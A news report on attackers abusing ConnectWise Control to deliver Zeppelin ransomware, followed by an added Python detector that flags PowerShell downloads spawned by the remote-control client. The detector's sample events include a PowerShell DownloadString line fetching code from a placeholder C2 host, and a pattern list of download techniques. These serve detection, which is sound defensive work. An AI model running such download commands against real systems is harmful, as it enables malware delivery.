Attackers abuse ConnectWise Control software to deliver Zeppelin ransomware

Remote attackers have abused ConnectWise Control software to deliver ransomware to victims. The latest attacks against a real estate company used ransomware dubbed “Zeppelin”, a variant of the VegaLocker ransomware family.

According to security firm Morphisec, the more recent ransomware was delivered via ConnectWise Control software (formerly ScreenConnect). IT admins use the software to remotely control and execute commands on systems from a centralized web console.

Morphisec also said it prevented the Zeppelin attack after detecting activity at one of its customers in the real estate industry.

“The expansion of this particular variant into real estate makes it clear that attackers are expanding their use of the ransomware beyond their initial forays into infiltrating healthcare and IT companies,” Alon Groisman of Morphisec said in a recent blog post.

Groisman further described the delivery method and attack chain that occurred on December 2, 2019. For instance, the attack methods use the ScreenConnect CMD shell and PowerShell commands to download commands from a command and control (C2) server. The downloaded commands are then used to ultimately deliver the Zeppelin malware.
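A defender can hunt for the chain described above by walking process ancestry in process-creation telemetry. The following is an added example, not code from Morphisec or ConnectWise. The event schema, the client image name `ScreenConnect.ClientService.exe`, the download patterns and the sample events are assumptions constructed for illustration.

```python
import re

# Assumption: image name of the ConnectWise Control (ScreenConnect) client service.
RMM_IMAGES = {"screenconnect.clientservice.exe"}
# Generic PowerShell download patterns (assumed; the article does not quote the commands).
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)

# Constructed process-creation events (pid, ppid, image, cmdline); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 700, "ppid": 4, "image": "ScreenConnect.ClientService.exe", "cmdline": ""},
    {"pid": 810, "ppid": 700, "image": "cmd.exe", "cmdline": "cmd.exe /c run.cmd"},
    {"pid": 811, "ppid": 810, "image": "powershell.exe",
     "cmdline": "powershell -c (New-Object Net.WebClient)"
                ".DownloadString('http://c2.example.invalid/a')"},
    {"pid": 820, "ppid": 700, "image": "cmd.exe", "cmdline": "cmd.exe /c ipconfig /all"},
    {"pid": 900, "ppid": 500, "image": "powershell.exe",
     "cmdline": "powershell Invoke-WebRequest https://updates.example.invalid/agent.msi"},
]


def lineage(pid, by_pid):
    """Return lower-cased image names from the process up to the last known ancestor."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against pid loops
        seen.add(pid)
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Flag PowerShell downloads whose ancestry includes the remote-control client."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if e["image"].lower() != "powershell.exe" or not DOWNLOAD_RE.search(e["cmdline"]):
            continue
        chain = lineage(e["pid"], by_pid)
        if any(img in RMM_IMAGES for img in chain[1:]):
            alerts.append({"pid": e["pid"], "chain": " <- ".join(chain)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only the PowerShell download descended from the remote-control client is flagged; the unrelated `Invoke-WebRequest` and the benign `ipconfig` run from the same console are not. Legitimate admin scripts run through the console will also match, so the output is a triage lead rather than a verdict.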